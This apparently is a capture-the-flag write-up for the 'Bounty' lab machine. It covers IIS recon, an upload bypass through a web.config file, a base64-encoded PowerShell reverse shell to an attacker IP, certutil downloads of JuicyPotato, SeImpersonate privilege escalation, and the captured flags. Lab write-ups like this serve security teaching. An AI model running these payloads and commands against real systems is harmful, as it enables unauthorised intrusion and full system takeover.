Bounty

Recon

nmap_scan.log
Open 10.129.97.182:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.97.182

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP (80)

Writeup.png
└─$ curl http://10.129.97.182/merlin.jpg -Os
└─$ file merlin.jpg
merlin.jpg: JPEG image data, JFIF standard 1.02, resolution (DPI), density 200x200, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS4 Windows, datetime=2012:03:20 00:51:07], baseline, precision 8, 2000x2000, components 3

Backend is IIS server, version 7.5

Writeup-1.png

All the pages give 403 - Forbidden: Access is denied.

└─$ feroxbuster -u 'http://10.129.97.182/' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
301      GET        2l       10w      158c http://10.129.97.182/aspnet_client => http://10.129.97.182/aspnet_client/
301      GET        2l       10w      158c http://10.129.97.182/uploadedfiles => http://10.129.97.182/uploadedfiles/
200      GET     1624l    16517w  1403476c http://10.129.97.182/merlin.jpg
200      GET       32l       53w      630c http://10.129.97.182/
301      GET        2l       10w      158c http://10.129.97.182/uploadedFiles => http://10.129.97.182/uploadedFiles/
301      GET        2l       10w      158c http://10.129.97.182/UploadedFiles => http://10.129.97.182/UploadedFiles/
301      GET        2l       10w      158c http://10.129.97.182/Aspnet_client => http://10.129.97.182/Aspnet_client/
301      GET        2l       10w      158c http://10.129.97.182/aspnet_Client => http://10.129.97.182/aspnet_Client/
301      GET        2l       10w      169c http://10.129.97.182/aspnet_client/system_web => http://10.129.97.182/aspnet_client/system_web/
301      GET        2l       10w      158c http://10.129.97.182/ASPNET_CLIENT => http://10.129.97.182/ASPNET_CLIENT/
301      GET        2l       10w      169c http://10.129.97.182/Aspnet_client/system_web => http://10.129.97.182/Aspnet_client/system_web/
301      GET        2l       10w      169c http://10.129.97.182/aspnet_Client/system_web => http://10.129.97.182/aspnet_Client/system_web/
301      GET        2l       10w      169c http://10.129.97.182/ASPNET_CLIENT/system_web => http://10.129.97.182/ASPNET_CLIENT/system_web/

We can fuzz for file extensions, since webserver is IIS it's probably using ASP[X] files.

└─$ feroxbuster -u 'http://10.129.97.182/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -n -x asp,aspx
301      GET        2l       10w      158c http://10.129.97.182/aspnet_client => http://10.129.97.182/aspnet_client/
200      GET     1624l    16517w  1403476c http://10.129.97.182/merlin.jpg
200      GET       32l       53w      630c http://10.129.97.182/
200      GET       22l       58w      941c http://10.129.97.182/transfer.aspx
301      GET        2l       10w      158c http://10.129.97.182/uploadedfiles => http://10.129.97.182/uploadedfiles/

Upload Form

Uploading JPG worked, but ASPX not.

Writeup-2.png

Fuzzing with /usr/share/seclists/Discovery/Web-Content/web-extensions.txt wordlist returns no valid result, looks like only images are valid (?)

Writeup-3.png

*.aspx files return different output 🤔

Writeup-4.png

web.config RCE

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services#execute-.config-files

We are able to upload *.config files.

Writeup-5.png

Reverse Shell (merlin)

Get a reverse shell

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA5ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
PS C:\Users\merlin> whoami /all

User Name     SID
============= ==============================================
bounty\merlin S-1-5-21-2239012103-4222820348-3209614936-1000

Group Name                           Type             SID                                                           Attributes
==================================== ================ ============================================================= ==================================================
Everyone                             Well-known group S-1-1-0                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568                                                  Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0                                                       Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\DefaultAppPool           Well-known group S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                  Mandatory group, Enabled by default, Enabled group

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Privilege Escalation

SeImpersonatePrivilege privilege stands out.

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#seimpersonateprivilege

Because dotnet isn't install I think that's why efs kept failing.

PS C:\inetpub\wwwroot\UploadedFiles> certutil.exe -urlcache -f http://10.10.14.99/efs.exe efs.exe

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotatohttps://github.com/ohpe/juicy-potatohttps://github.com/ohpe/juicy-potato/releases/tag/v0.1

└─$ curl -LOs https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
---
PS C:\Users\merlin\Music> certutil.exe -urlcache -f http://10.10.14.99/JuicyPotato.exe jp.exe
PS C:\Users\merlin\Music> C:\Users\merlin\Music\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\windows\system32\cmd.exe -a "/c net localgroup administrators merlin /add" -t *

Adding this user to Administrators yielded no successes for whatever reason..

Reverse shell was too much overhead, but ended up doing it

PS C:\Users\merlin\Music> where.exe powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PS C:\Users\merlin\Music> C:\Users\merlin\Music\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -a "-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA5ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" -t *

Flags

PS C:\> ls /Users -fil *.txt -rec | %{$_.FullName;echo " ";cat $_.FullName}
C:\Users\Administrator\Desktop\root.txt

4a3637f74b0596935c1af382ab8255d4
PS C:\> cat /Users/merlin/Desktop/user.txt
03b2a8d84060db27d39bfc331013b65c

Note: The user flag was hidden. -force to show hidden files with powershell, but that also shows every hidden file.

PreviousBackendNextBountyHunter

Last updated